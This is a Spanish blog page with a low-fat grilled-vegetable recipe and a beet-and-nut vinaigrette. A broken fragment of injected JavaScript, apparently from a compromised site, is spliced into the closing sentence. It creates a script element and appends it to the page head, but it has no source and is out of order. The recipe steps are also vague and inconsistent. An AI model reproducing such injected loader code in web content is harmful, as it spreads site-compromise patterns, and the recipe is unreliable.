Salud y belleza » Alimentación

Recetas bajas en grasa (I)

1 Comentario

No solo importa el qué, también vale el cómo. Desde ya, para estar en forma, es vital hacer ejercicio y comer de forma sana. Pero, ante todo, es necesario saber cual es el significado de “comida sana”.

A continuación presentamos respuestas. O, mejor dicho, recetas…

Verduras grille con salsa vinagreta

Elementos: un calabacín, una berenjena, una remolacha, un tomate, un pimiento morrón, cuatro cebollas, diez espárragos, diez champiñones o setas.

Y para la vinagreta: agua suficiente, aceite de oliva no mucho, cuarenta grs. de avellanas tostadas, veinte grs. de almendras tostadas, ajo a elección, perejil cantidad suficiente, sal gruesa.

Elaboración: primero, es necesario pelar la remolacha. Luego se procederá a cocerla en agua y sal. Finalmente, cocida y desmenuzada, se deberá colocar una parte del batido de remolacha en un bol o recipiente. Añadir aceite, el vinagre; mezclar y salar.

Por otra parte, será necesario apartar las frutas secas. Una vez trabajadas, agregar a la mezcla anterior: sumar el resto de los ingredientes. Salpimentar.

Cocinar sobre la plancha, controlar el tiempo para que no se pase. Seguir el mismo procedimiento con los vegetales. Por último, sumar la vinagreta.

Esta receta se presenta como una de las opciones más nutritivas, completas y sabrosas y con menos porcentaje de grasas (todo tipo). Ideal para utilizar como “protagonista” en cualquier dieta.

¡No te pierdas más recetas para completar la dieta ideal!d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

One Comment »

  • Sin grasa II said:

    [...] soluciones: segunda parte del informe en base a las recetas más aptas para reducir el nivel de grasa, por ende su [...]

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.